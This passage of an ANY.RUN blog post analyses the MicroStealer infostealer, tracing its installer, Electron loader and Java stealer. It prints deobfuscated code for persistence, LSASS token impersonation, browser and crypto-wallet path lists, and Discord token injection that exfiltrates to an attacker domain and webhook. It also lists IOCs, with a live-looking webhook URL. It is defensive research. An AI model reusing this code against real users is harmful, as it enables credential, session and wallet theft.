To restore them, the malware uses the decompressFromUTF16 method: rwLytg.tuWPH66 = cIb9x8P.decompressFromUTF16(rwLytg.DDXChP); 

This means that the value stored in DDXChP is the result of UTF-16-based compression. The obfuscator may reference the library under a different name, such as cIb9x8P, but the logic remains the same: the original string data is reconstructed from the compressed sequence.

After decompression, the resulting string is split using the | delimiter: Tky9na.rwLytg.zxxO0HE = tuWPH66.split("|"); 

A specific string is then retrieved by index through a getter function: 

wa4Ibtk = function (mjAYxpv) { 
    return zxxO0HE[mjAYxpv]; 
}; 

Later, the malware references these strings through calls such as wa4Ibtk(3), wa4Ibtk(7), and wa4Ibtk(11), where the argument represents an index in the zxxO0HE array.

After removing the unnecessary junk code, this logic can be represented in the following simplified form:

var GetString; 
(function InitializeStringTable() { 
var compressed = "ɡⱃ¼ǀ⼡砫\ư෠祘ഀΠ䌡渡洀 (...truncated)"; 
var decompressed = lzObject.decompressFromUTF16(compressed); 
 
var stringTable = decompressed.split("|"); 
GetString = function (index) { 
return stringTable[index]; 
}; 
})(); 

Next, we copy the lzObject implementation from the target script and run the resulting function in a separate script. This makes it possible to extract all strings used by the program. Since the total number of recovered strings is quite large, only some of the most interesting examples are shown below, along with their indices.
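A hypothetical version of that extraction script is sketched below; the LZ-String decompression step is left as a comment because the real compressed blob is truncated in the sample, so a stand-in table is used instead:

```javascript
// Hypothetical dumper for this step: in practice, the lzObject copy and the
// compressed blob are pasted from index.js (left as a comment here because
// the blob is truncated in the sample).
// const stringTable = lzObject.decompressFromUTF16(compressedBlob).split("|");
function dumpStrings(stringTable) {
  // Print every recovered string with its index, one per line.
  return stringTable.map((s, i) => `[${i}] ${s}`).join("\n");
}

console.log(dumpStrings(["spawn", "exec", "env"]));
```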

Note that many strings are truncated and concatenated directly in the code. Their full values are provided in parentheses:

[2]  spawn 
[3]  exec 
[59] env 
 
[11-25] 
    try { 
        Start-Process -FilePath " -ArgumentList '--install' -Verb RunAs 
        Stop-Process -Id 
        exit 0 
    } catch { 
        exit 1 
    } 
 
[35-41] powershell -ExecutionPolicy Bypass -NoProfile -NonInteractive -File " 
 
[27]    tmpdir 
[32-34] writeF + ileSyn (writeFileSync) 
[54-55] unlink + Sync (unlinkSync) 
[79]    exists 
[107-108] readFi + leSync (readFileSync) 
 
[60-65] LOCALA + PPDATA → USERPR + OFILE → AppDat + a + Local (LOCALAPPDATA / USERPROFILE / AppDataLocal) 
[66]    soft.j (soft.jar) 
[67]    model 
[68]    jre 
[69]    bin 
[70-71] miicro + soft.e (miicrosoft.exe) 
[73-74] resour + cesPat (resourcesPath) 
[76-78] app.as + ar.unp + acked (app.asar.unpacked) 
[81-82] model. + zip (model.zip) 
 
[128]   -jar 
[129-132] detach (detached), stdio, ignore, unref 
[140-141] --inst + all (--install) 

Let us now examine the obfuscated code fragments that implement the logic for launching the main payload, which is distributed in JAR format: 

    const mjAYxpv = [0, null, 32, 2, 1, 256, 6, 3, 8, 16, 4, "undefined", "LZString", "=", " ", ";", "\\", 15, 30, "\"", !1, !0, void 0, 26, 59, 10, 73, 74, "h", 55, 66, "ar", 79, 1023, 65536, 55296, 56320, 63, 31, 12, 18, 7, 128, 192, "e", 91, 92, 93, 255, 224, 240, 97, 98, 99, 100, "d", 33, "c", ")", 106, 107, 108, "g", 24, 60, 1000]; 
 
    // ... 
 
    const Tky9na = require("fs"), 
    _LLSkL = require("path"), 
    { 
        [wa4Ibtk(mjAYxpv[3])]: E5NpXn, 
        [wa4Ibtk(mjAYxpv[7])]: TD4p2BE 
    } = require("child_process"), 
    peB9yJ = require("os"), 
    OnZdH7B = require("adm-zip"); 
 
    // ... 
 
    const JbBfOsP = process[wa4Ibtk(mjAYxpv[24])][wa4Ibtk(mjAYxpv[64]) + wa4Ibtk(61)] || _LLSkL[wa4Ibtk(mjAYxpv[23])](process[wa4Ibtk(mjAYxpv[24])][wa4Ibtk(62) + wa4Ibtk(mjAYxpv[37])], wa4Ibtk(64) + "a", wa4Ibtk(65)), 
        TD4p2BE = _LLSkL[wa4Ibtk(mjAYxpv[23])](JbBfOsP, wa4Ibtk(mjAYxpv[30]) + mjAYxpv[31]), 
        peB9yJ = _LLSkL[wa4Ibtk(mjAYxpv[23])](JbBfOsP, wa4Ibtk(67), wa4Ibtk(68), wa4Ibtk(69), wa4Ibtk(70) + wa4Ibtk(71) + "xe"); 
 
    // ... 
 
    const vWOBncd = E5NpXn(peB9yJ, [wa4Ibtk(mjAYxpv[42]), TD4p2BE], { 
        [wa4Ibtk(129) + "ed"]: mjAYxpv[21], 
        [wa4Ibtk(130)]: wa4Ibtk(131), 
        [wa4Ibtk(mjAYxpv[24])]: process[wa4Ibtk(mjAYxpv[24])] 
    }); 
    vWOBncd[wa4Ibtk(132)](); 
    process[wa4Ibtk(mjAYxpv[59])](mjAYxpv[0]) 

After removing the junk code and substituting the resolved strings, this logic can be represented in the following much more readable form: 

const fs = require("fs"); 
const path = require("path"); 
const { spawn, exec } = require("child_process"); 
const os = require("os"); 
const AdmZip = require("adm-zip"); 
 
const baseDir = 
    process.env.LOCALAPPDATA || 
    path.join(process.env.USERPROFILE, "AppData", "Local"); 
 
const jarPath = path.join(baseDir, "soft.jar"); 
 
const javaExePath = path.join( 
    baseDir, 
    "model", 
    "jre", 
    "bin", 
    "miicrosoft.exe" 
); 
 
const child = spawn( 
    javaExePath, 
    ["-jar", jarPath], 
    { 
        detached: true, 
        stdio: "ignore", 
        env: process.env 
    } 
); 
 
child.unref(); 
 
process.exit(0); 

The malware then extracts an embedded JRE, disguises the executable as miicrosoft.exe, launches the JAR file in the background, and immediately terminates the main Node.js process, allowing the payload to continue running independently.



Breaking Down the Execution Chain 

As part of its execution chain, the malware also attempts to obtain elevated privileges. This stage is not analyzed in detail here, as it relies primarily on social engineering: the victim is simply presented with a UAC prompt that is likely to be perceived as a normal part of the installation process. 

The PowerShell script used for this step is shown below: 

try { 
    Start-Process -FilePath "Game Launcher.exe" -ArgumentList '--install' -Verb RunAs 
    Stop-Process -Id (pid) 
    exit 0 
} catch { 
    exit 1 
} 

At this stage, the role of Game Launcher.exe becomes clear. The presence of the resources directory containing an ASAR archive and a Node.js project indicates the use of Electron. Analysis in Ghidra confirms this: a modal window prompts the analyst to load electron.pdb, and both the strings and the entry point contain characteristic Electron artifacts.

Strings from the Electron framework in the disassembler confirm that Electron is used in the binary. 

Ultimately, Game Launcher.exe is an Electron application used as part of the malware delivery chain. The execution flow is as follows: 

  • NSIS (RocobeSetup.exe): An archive installer containing the malicious payload 
  • Electron (Game Launcher.exe): Requests administrator privileges through UAC 
  • Electron (Game Launcher.exe –install): Extracts and launches the JAR file 
  • Java (miicrosoft.exe -jar soft.jar): Executes the main malicious logic 

The combination of an NSIS installer and Electron significantly complicates static analysis of the malware. Electron can read and execute JavaScript code directly from an ASAR archive without extracting it to the file system, bypassing traditional signature-based detection mechanisms. 

At the same time, the NSIS installer ensures that the malicious files remain unavailable for analysis or detection until the installer itself finishes execution. 

Static Analysis of the Java Module 

The next step is to analyze the main module by loading the JAR file into a disassembler. Once again, we encounter obfuscated code; this time on the Java side. As with the Node.js component, the strings are encrypted and recovered through helper functions. A representative fragment is shown below:

private static void lambda$checkEnvironment$1(String str) throws Exception { 
    int iD = a.d(); 
    String[] strArr = new String[a(0x5e23, 0x6709cb2b9951dedeL)]; 
    strArr[0] = a((int) 0xfffff707, (int) 0xfffff6e2); 
    strArr[1] = a((int) 0xfffff636, (int) 0xffff90f5); 
    strArr[2] = a((int) 0xfffff6c2, (int) 0xfffff530); 
     
    // ... 
 
    ?? AnyMatch = iD; 
    AnyMatch = Arrays.asList(strArr).stream().anyMatch((v1) -> { 
        return lambda$null$0(r1, v1); 
    }); 
} 

After identifying this characteristic pattern, we examined the header of the .class file to look for traces of the obfuscator in use, and immediately found ZKM (Zelix KlassMaster) v21.0.0.

The presence of the ZKM (Zelix KlassMaster) v21.0.0 obfuscator string in the Java class constant pool confirms its use 

There are already several effective public deobfuscators available for this version of ZKM. In this case, Threadtear was used with a set of ZKM-focused modules, including string deobfuscation, access restoration, flow deobfuscation, and several additional modules for bytecode cleanup. After successful deobfuscation, the analysis proceeded to the malware’s core functionality.

Overview of MicroStealer Capabilities 

After deobfuscation, the code became significantly more readable, although not entirely; some parts of the logic still remain convoluted. Even so, the core functionality of MicroStealer is already open to analysis. Let us look at its modules in more detail:

Persistence 

Persistence is implemented through the Windows Task Scheduler: 

private void a() throws InterruptedException, IOException { 
    String string = System.getenv("LOCALAPPDATA"); 
    string = System.getProperty("user.home") + "\\AppData\\Local"; 
    String string2 = string + "\\model\\jre\\bin\\miicrosoft.exe"; 
    String string3 = string + "\\soft.jar"; 
    String string4 = System.getProperty("user.name"); 
    String string5 = "App_" + string4; 
    String string6 = String.format("schtasks /create /tn \"%s\" /tr \"\\\"%s\\\" -jar \\\"%s\\\"\" /sc ONLOGON /delay 0000:05 /rl HIGHEST /f", string5, string2, string3); 
    Process process = Runtime.getRuntime().exec(string6); 
    process.waitFor(); 
} 

The command creates a task in Windows Task Scheduler with the ONLOGON trigger (executed when the user logs in), a 5-second delay, and highest privileges (HIGHEST). As a result, the malware automatically resumes operation even after the system is rebooted. 
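For defenders, this persistence pattern is hunt-friendly. A hedged sketch of a check over parsed `schtasks /query /fo csv /v` output (the `name` and `action` field names are assumptions about the parsed shape, not a standard schema):

```javascript
// Hedged hunting sketch, not vendor tooling: flag scheduled tasks that match
// the App_<user> naming scheme or launch a jre\bin executable from a
// user-writable AppData\Local path, mirroring the persistence logic above.
function findSuspiciousTasks(tasks) {
  return tasks.filter(
    (t) =>
      /^App_/.test(t.name) ||
      /\\AppData\\Local\\.*\\jre\\bin\\[^\\]+\.exe/i.test(t.action)
  );
}
```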

Virtual Machine Detection 

MicroStealer checks the execution environment for processes and services typically associated with virtual machines. If at least one match is found, execution is terminated immediately.

Despite these anti-analysis checks, the sample executes successfully in the ANY.RUN sandbox, allowing its behavior to be fully exposed during analysis.



This makes it possible to observe the malware’s logic in action and extract valuable IOCs for further detection and threat hunting. 

private static void checkEnvironment(String str) throws Exception { 
    String[] strArr = new String[13]; 
    strArr[0]  = "vmwaretray"; 
    strArr[1]  = "vmwareuser"; 
    strArr[2]  = "vgauthservice"; 
    strArr[3]  = "vmacthlp"; 
    strArr[4]  = "vmsrvc"; 
    strArr[5]  = "vmusrvc"; 
    strArr[6]  = "vmtoolsd"; 
    strArr[7]  = "vboxservice"; 
    strArr[8]  = "vboxtray"; 
    strArr[9]  = "qemu-ga"; 
    strArr[10] = "xenservice"; 
    strArr[11] = "prl_cc"; 
    strArr[12] = "prl_tools"; 
 
    boolean anyMatch = Arrays.asList(strArr) 
        .stream() 
        .anyMatch(v1 -> str.toLowerCase().contains(v1)); 
 
    if (anyMatch) { 
        Runtime.getRuntime().halt(0); 
    } 
} 

Browser Data Theft 

MicroStealer supports a wide range of Chromium-based browsers, as well as Opera and Opera GX. For each detected browser, it accesses the user’s profile data and then extracts protected information using Windows DPAPI.

put("Chrome", localAppData + "\\Google\\Chrome\\User Data"); 
put("Brave", localAppData + "\\BraveSoftware\\Brave-Browser\\User Data"); 
put("Edge", localAppData + "\\Microsoft\\Edge\\User Data"); 
put("Vivaldi", localAppData + "\\Vivaldi\\User Data"); 
put("Yandex", localAppData + "\\Yandex\\YandexBrowser\\User Data"); 
put("Chromium", localAppData + "\\Chromium\\User Data"); 
// ... 
 
put("Opera", appData + "\\Opera Software\\Opera Stable"); 
put("Opera GX", appData + "\\Opera Software\\Opera GX Stable"); 

Interaction with LSASS 

When LSA protection is disabled (RunAsPPL = 0), the malware attempts to obtain elevated privileges by interacting with the lsass.exe process. It enables SeDebugPrivilege, searches for LSASS in the process list, and then duplicates its security token and impersonates the token in the current thread:

Advapi32Util.registryGetIntValue(HKEY_LOCAL_MACHINE,  
    "SYSTEM\\CurrentControlSet\\Control\\Lsa", "RunAsPPL"); 
 
af.INSTANCE.RtlAdjustPrivilege(SeDebugPrivilege, true, false, intByReference); 
 
WinNT.HANDLE snapshot = Kernel32.INSTANCE.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
while (Kernel32.INSTANCE.Process32Next(snapshot, processEntry)) { 
    if ("lsass.exe".equalsIgnoreCase(Native.toString(processEntry.szExeFile))) { 
        HANDLE hProcess = Kernel32.INSTANCE.OpenProcess(PROCESS_QUERY_INFORMATION, false, processEntry.th32ProcessID); 
         
        Advapi32.INSTANCE.OpenProcessToken(hProcess, TOKEN_DUPLICATE, tokenHandle); 
        Advapi32.INSTANCE.DuplicateToken(tokenHandle.getValue(), SecurityImpersonation, duplicatedToken); 
        Advapi32.INSTANCE.ImpersonateLoggedOnUser(duplicatedToken.getValue()); 
        break; 
    } 
} 

Screen Capture 

The malware captures the user’s current screen using java.awt.Robot. The resulting image is saved in PNG format and then packaged into a ZIP archive for later exfiltration.

Robot robot = new Robot(); 
Rectangle screen = new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()); 
BufferedImage screenshot = robot.createScreenCapture(screen); 
ImageIO.write(screenshot, "png", new File("screenshot.png")); 

Additional MicroStealer Functionality 

MicroStealer targets both browser-based cryptocurrency wallet extensions (via Local Extension Settings) and desktop wallet applications. The wallet files are copied in full, without any additional processing.

put("Metamask", "\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"); 
put("Phantom", "\\Local Extension Settings\\bfnaelmomeimhlpmgjnjophhpkkoljpa"); 
put("Trust Wallet", "\\Local Extension Settings\\egjidjbpglichdcondbcbdnbeeppgdph"); 
put("Coinbase", "\\Local Extension Settings\\hnfanknocfeofbddgcijnmhnfnkdnaad"); 
// ... 
 
put("Exodus", appData + "\\Exodus\\exodus.wallet"); 
put("Electrum", appData + "\\Electrum\\wallets"); 
put("AtomicWallet", appData + "\\atomic\\Local Storage\\leveldb"); 
put("Ethereum", appData + "\\Ethereum\\keystore"); 
put("Jaxx", appData + "\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb"); 
// ... 

JavaScript code is injected into the Discord desktop application, using Webpack Chunk Injection to access internal client modules and the Chrome DevTools Protocol (CDP) to intercept network requests and monitor user activity. 

const { session, BrowserWindow } = require('electron'); 
const C = { webhook: { url: 'https://78smp.com/m/' } }; 
 
// token extraction from webpack 
window.webpackChunkdiscord_app.push([ 
    [Math.random()], {}, 
    (r) => { 
        for (const mid in r.c) { 
            const getToken = r.c[mid]?.exports?.default?.getToken; 
            if (typeof getToken === 'function') return getToken(); 
        } 
    } 
]); 
 
// CDP-based network interception 
w.webContents.debugger.attach('1.3'); 
w.webContents.debugger.on('message', async (_, m, p) => { 
    // /auth/login, /mfa/totp, /users/@me 
    // exfiltration to Discord webhook 
}); 

The malware intercepts events related to logins, credential changes, 2FA enablement, and the addition of payment methods such as Stripe and Braintree/PayPal. In addition, it collects account metadata such as badges, Nitro level, and similar attributes, which may indicate an attempt to profile victims.

Steam Account Profiling 

The malware also collects information about the victim’s Steam account. Using a hardcoded API key, the stealer queries the Steam Web API to retrieve the profile level, number of owned games, and account creation date. 

While this information does not provide direct access to the account on its own, it may be used to assess the victim’s value and prioritize targets, similarly to the profiling observed in Discord.

String apiKey = "440D7F4D810EF9298D25EDDF37C1F902"; 
 
String levelUrl = String.format( 
    "https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=%s&steamid=%s", 
    apiKey, steamId 
); 
 
String gamesUrl = String.format( 
    "https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=%s&steamid=%s", 
    apiKey, steamId 
); 
 
String summaryUrl = String.format( 
    "https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=%s&steamids=%s", 
    apiKey, steamId 
); 

Detecting MicroStealer Early: A Practical Investigation Loop 

MicroStealer highlights a familiar problem for many security teams: new malware families often appear before reliable signatures or threat intelligence become widely available.

When that happens, defenders are left with suspicious files, unclear alerts, and limited external context. Without fast verification, attackers can quietly collect credentials, session tokens, and other sensitive data while investigations stall. 

Early detection depends on how quickly a team can move from uncertain signals to confirmed malicious behavior. 

1. Monitoring: Spot Suspicious Infrastructure Early 

Infostealers often rely on external services and fresh infrastructure for data exfiltration. In the case of MicroStealer, stolen information is transmitted through Discord webhooks and attacker-controlled servers.

Monitoring for newly observed infrastructure and suspicious connections can help teams catch early signs of compromise before the malware fully completes its collection and exfiltration stages. 
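A minimal sketch of this kind of matching, assuming the feed is exported as a plain list of domains and IPs and compared against outbound destinations from proxy or DNS logs (`flagSuspicious` is a hypothetical helper, not an ANY.RUN API):

```javascript
// Hedged sketch: compare observed outbound destinations against an IOC list.
// Matching is case-insensitive; real deployments would also normalize ports,
// subdomains, and CIDR ranges.
function flagSuspicious(connections, iocs) {
  const iocSet = new Set(iocs.map((i) => i.toLowerCase()));
  return connections.filter((c) => iocSet.has(c.toLowerCase()));
}
```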

ANY.RUN’s Threat Intelligence Feeds continuously surface newly observed indicators based on telemetry and submissions from 15,000+ organizations and 600,000+ security professionals. 

100% actionable IOCs delivered by TI Feeds to your existing stack 

For SOC teams, this means fewer blind spots in monitoring and earlier visibility into suspicious domains, IPs, and attacker infrastructure. 



2. Triage: Confirm Behavior Instead of Guessing 

New malware families like MicroStealer often lack clear static signatures or reliable reputation data, which slows down traditional investigation workflows.

Instead of relying only on static verdicts, analysts can quickly confirm what a suspicious file actually does by executing it in a controlled environment. 

Running the sample in the ANY.RUN interactive sandbox reveals the full execution chain, including: 

  • NSIS installer delivering the payload 
  • Electron loader extracting the JAR module
  • Java stealer executing its data collection logic  
  • Attempts to steal browser credentials and wallet data 
  • Communication with Discord webhooks and external servers 

Relevant IOCs automatically gathered in one tab inside ANY.RUN sandbox 

Within minutes, analysts can observe the complete attack chain, extract reliable IOCs, and determine whether the sample poses a real threat.

For SOC teams, this replaces guesswork with behavior-based evidence, helping reduce investigation time and avoid unnecessary escalations.
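The execution chain above also suggests a behavioral detection angle: the NSIS installer spawning an Electron binary that in turn launches Java is an unusual process lineage. The sketch below checks a process lineage against that pattern; the event format and process names are assumptions based on this report, and field names would need mapping to your EDR telemetry.

```python
# Sketch: flag the NSIS -> Electron -> Java lineage observed in
# MicroStealer's execution chain. Names are illustrative; a real rule
# would match on broader patterns (any installer -> Electron -> java.exe).

SUSPICIOUS_CHAIN = ("rocobesetup.exe", "game launcher.exe", "java.exe")

def matches_chain(lineage):
    """True if the lineage (oldest -> newest) ends with the suspicious chain."""
    names = tuple(p.lower() for p in lineage)
    return names[-len(SUSPICIOUS_CHAIN):] == SUSPICIOUS_CHAIN

# Hypothetical process lineage reconstructed from EDR events:
benign = ["explorer.exe", "chrome.exe"]
suspect = ["explorer.exe", "RocobeSetup.exe", "Game Launcher.exe", "java.exe"]
```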

74% of Fortune 100 companies rely on ANY.RUN for earlier detection and faster SOC response.

Power your SOC now ➜


3. Threat Hunting: Expand Detection from One Sample 

Once a stealer like MicroStealer is confirmed, the next step is ensuring it does not appear elsewhere in the environment.

Using Threat Intelligence Lookup, analysts can pivot from the initial indicators to discover related infrastructure, connected samples, and similar activity patterns. 

This allows teams to: 

  • identify related domains and IP addresses 
  • find other samples using the same infrastructure 
  • detect variants using the same delivery chain 

threatName:"microstealer" 

ANY.RUN TI Lookup demonstrates relevant sandbox sessions with MicroStealer 

By pivoting across infrastructure and behavior, organizations can transform a single investigation into broader detection coverage across the environment.
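The pivoting step can be sketched as grouping sandbox results by shared infrastructure: domains contacted by more than one sample point to related activity. The result records below are hypothetical stand-ins for what a TI Lookup query would return; domain names are taken from the IOCs in this report.

```python
# Sketch: pivot from one confirmed sample to related activity by
# clustering results on shared infrastructure. Records are illustrative;
# a real workflow would populate them from TI Lookup query results.
from collections import defaultdict

results = [
    {"sample": "sample-A", "domains": ["vrcpluginhub.com", "78smp.com"]},
    {"sample": "sample-B", "domains": ["78smp.com", "kittenscraft.com"]},
    {"sample": "sample-C", "domains": ["example.org"]},
]

by_domain = defaultdict(set)
for r in results:
    for d in r["domains"]:
        by_domain[d].add(r["sample"])

# Domains shared by more than one sample are pivot points worth hunting on.
pivots = {d: s for d, s in by_domain.items() if len(s) > 1}
```

Here `78smp.com` links sample-A and sample-B, turning one confirmed detection into a lead on a second, related sample.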

Conclusion: Faster Clarity Means Lower Risk 

MicroStealer demonstrates how modern infostealers combine layered delivery chains, heavy obfuscation, and anti-analysis techniques to slow down detection. 

However, even complex malware becomes manageable when teams can quickly move from uncertain alerts to clear behavioral evidence. 

By combining early monitoring, fast behavioral triage, and targeted threat hunting, security teams can uncover emerging threats faster, reduce investigation time, and limit the risk of data theft inside corporate environments. 

Bring speed and clarity to your SOC with ANY.RUN ➜ 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, fits naturally into modern SOC workflows and supports investigations from initial alert to final containment. 

The platform allows teams to safely execute suspicious files and URLs, observe real behavior in an interactive environment, enrich indicators with immediate context through TI Lookup, and continuously monitor emerging infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce uncertainty, accelerate triage, and limit unnecessary escalations across the SOC. 

ANY.RUN also meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls.

Indicators of Compromise (IOCs)   

Analyzed Files 

RocobeSetup.exe (NSIS Installer) 
  MD5: 23A705FA71DA6A9191618AEDC1144C4A 
  SHA1: 755C21DD36A49086F98C87A172B900E6424F467A 
  SHA256: 9CF1D4F87D9F2EDF53CE681B59C209F57A805E6157693E784D9D946FC3B17A04 

Game Launcher.exe (Electron) 
  MD5: A137BF79A2D5F1C8104AF40EC93E4E66 
  SHA1: C83D75BF9F9FDA4E6EF7B2C575BC9D3D82D6590B 
  SHA256: 05F0C8E89248D3477115D9F62B20CA8A95D925140C727E975AB9F3025A5AD01D 

soft.jar (MicroStealerCore) 
  MD5: 04EA30CD1B74E2844BE939BD1FFE0084 
  SHA1: B7D0F8954BAFAB5E79AE96C07E683C229C9F7B72 
  SHA256: DF5E2B824C0FD40323A46019BFBC325F89B5B68697ED3C94B52189CF90E1BEC4 

Network indicators 

HTTPS Requests: 

https[:]//78smp[.]com/m/ 

https[:]//discord[.]com/api/webhooks/1460660027969896695/FQ2nam1vUVDwLbiTZCPen9C53eBMg_qB3-z8pGRtZ3ZerbyflDnzfmJVLpgElxMNfO41 

Domains: 

vrcpluginhub[.]com 

buradakimvar[.]com 

kittenscraft[.]com 

dashlune[.]xyz 

buradabmwking[.]com 

crushfall[.]com 

slumpcute[.]com  

banterplugins[.]com 

velyonar[.]com 

churilend[.]com 

zarvethion[.]com 

kittiesmc[.]com 

kittycraftmc[.]com 

welarith[.]com 

eldrynworld[.]com 
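The indicators above are defanged (`[.]`, `[:]`) for safe publication. Before loading them into a blocklist or SIEM watchlist, they need to be refanged; a minimal helper covering the defanging conventions used here (plus the common `hxxp` scheme) might look like this:

```python
import re

def refang(ioc: str) -> str:
    """Convert a defanged indicator back to its live form for ingestion.

    Handles the [.] and [:] escapes used in this report, plus the common
    hxxp/hxxps scheme substitution.
    """
    ioc = ioc.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", ioc, flags=re.IGNORECASE)

# Usage: feed each published indicator through refang() before adding it
# to a blocklist, e.g. refang("vrcpluginhub[.]com").
```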

API Keys

Steam Web API Key: 440D7F4D810EF9298D25EDDF37C1F902 

MITRE ATT&CK Techniques 

Tactic  Technique  Description 
TA0002: Execution  T1204.002: User Execution: Malicious File  User runs NSIS installer / Game Launcher 
  T1059.001: Command and Scripting Interpreter: PowerShell  PowerShell script with Start-Process -Verb RunAs for UAC 
  T1059.003: Command and Scripting Interpreter: Windows Command Shell  schtasks used to create ONLOGON task 
TA0003: Persistence  T1053.005: Scheduled Task/Job: Scheduled Task  Task App_, ONLOGON, HIGHEST, 5s delay 
TA0004: Privilege Escalation  T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control  UAC prompt for elevation (social engineering) 
  T1134.001: Access Token Manipulation: Token Impersonation/Theft  DuplicateToken / ImpersonateLoggedOnUser on LSASS token 
TA0005: Defense Evasion  T1027: Obfuscated Files or Information  Node.js obfuscation + ZKM in JAR 
  T1036.005: Masquerading: Match Legitimate Resource Name or Location  miicrosoft.exe, Game Launcher naming 
  T1497.001: Virtualization/Sandbox Evasion: System Checks  Process list check for VMware, VBox, QEMU, etc. 
TA0006: Credential Access  T1555.003: Credentials from Password Stores: Credentials from Web Browsers  Chromium/Opera: passwords, autofill via DPAPI 
  T1539: Steal Web Session Cookie  Browser cookies extraction (session hijacking) 
  T1552.001: Unsecured Credentials: Credentials In Files  Wallet files and browser extension storage 
  T1003.001: OS Credential Dumping: LSASS Memory  LSASS access when RunAsPPL=0, token duplicate 
TA0007: Discovery  T1082: System Information Discovery  Collects hostname, OS, username, env vars for exfil report 
TA0009: Collection  T1113: Screen Capture  Screenshot via java.awt.Robot, PNG 
  T1560.001: Archive Collected Data: Archive via Utility  ZIP before exfiltration 
TA0010: Exfiltration  T1567.004: Exfiltration Over Web Service: Exfiltration Over Webhook  Data sent to Discord/webhook 
TA0011: Command and Control  T1071.001: Application Layer Protocol: Web Protocols  HTTPS to C2 / webhooks 

The post MicroStealer Analysis: A Fast-Spreading Infostealer with Limited Detection  appeared first on ANY.RUN’s Cybersecurity Blog.
